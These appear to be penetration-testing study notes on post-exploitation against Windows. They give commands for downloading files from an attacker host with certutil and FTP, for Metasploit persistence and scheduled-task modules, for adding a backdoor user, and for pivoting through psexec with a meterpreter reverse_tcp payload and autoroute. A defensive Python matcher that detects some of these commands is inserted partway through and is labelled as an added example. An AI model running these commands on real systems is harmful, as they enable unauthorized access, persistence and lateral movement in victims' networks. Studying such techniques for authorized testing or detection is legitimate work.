Post Exploitation

  1. File Transfers
  2. Maintaining Access
  3. Pivoting
  4. Cleanup

File Transfers

  • Certutil:
certutil.exe -urlcache -f http://10.10.10.10/file.txt
  • HTTP:
python -m http.server
  • Browser (navigate directly to file)

  • FTP:

#on the attacker machine
python -m pyftpdlib 21

#on the victim machine
ftp 10.10.10.10

Maintaining Access

  • Persistence scripts:
#3 methods (noisy)
#in msfconsole
run persistence -h

exploit/windows/local/persistence

exploit/windows/local/registry_persistence
  • Scheduled tasks:
#2 methods
#in msfconsole
run scheduleme

run schtaskabuse
  • Add user:
#preferred method
net user hacker password123 /add
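
The certutil, ftp and net user commands listed above each leave a process-creation record (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1), which is where a defender would look for them. The following is an added example, not part of the original notes: a small matcher run over constructed command lines. The rule names, host names and sample lines are assumptions made for illustration.

```python
import re

# Rule names are hypothetical labels. Each pattern targets one command from
# the notes above and captures the value an analyst would pivot on.
RULES = {
    # certutil used as a downloader: -urlcache together with an http(s) URL
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*?(?P<value>https?://\S+)", re.I),
    # built-in ftp client pointed at a bare IPv4 address
    "ftp_client_to_ip": re.compile(
        r"\bftp(?:\.exe)?\s+(?:-\S+\s+)*(?P<value>\d{1,3}(?:\.\d{1,3}){3})\b", re.I),
    # local account creation: net user <name> ... /add
    "local_user_added": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+(?P<value>\S+).*\s/add\b", re.I),
}


def match_rules(command_line):
    """Return (rule_name, captured_value) for every rule the line triggers."""
    hits = []
    for name, pattern in RULES.items():
        m = pattern.search(command_line)
        if m:
            hits.append((name, m.group("value")))
    return hits


def triage(events):
    """Flatten (host, command_line) events into (host, rule, value) findings."""
    return [(host, rule, value)
            for host, cmd in events
            for rule, value in match_rules(cmd)]


# Constructed sample events (host, command line); not taken from real logs.
SAMPLE_EVENTS = [
    ("WS01", r"C:\Windows\System32\certutil.exe -urlcache -f http://10.10.10.10/file.txt"),
    ("WS01", r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"),  # benign use
    ("WS01", "ftp 10.10.10.10"),
    ("WS01", "net user hacker password123 /add"),
    ("WS02", "net user administrator"),                             # benign query
]

if __name__ == "__main__":
    for host, rule, value in triage(SAMPLE_EVENTS):
        print(f"{host}  {rule}  {value}")
```

The two benign lines (a certutil hash check and a net user query) are in the sample on purpose: matching on the binary name alone would flag both.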

Pivoting

#example

#on the attacker machine
msfconsole

use exploit/windows/smb/psexec

set rhosts 192.168.57.141

set smbdomain marvel.local

set smbpass Password1

set smbuser fcastle

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set target 2

run
#meterpreter shell

shell
#switches to windows shell

route print
#to check routing

ipconfig

arp -a
#get an idea of machines in network

#move back to meterpreter shell using Ctrl+C

run autoroute -s 10.10.10.0/24
#for pivoting

run autoroute -p

Cleanup

  • Remove executables, scripts, added files
  • Remove malware, rootkits and added user accounts
  • Restore settings to their original configuration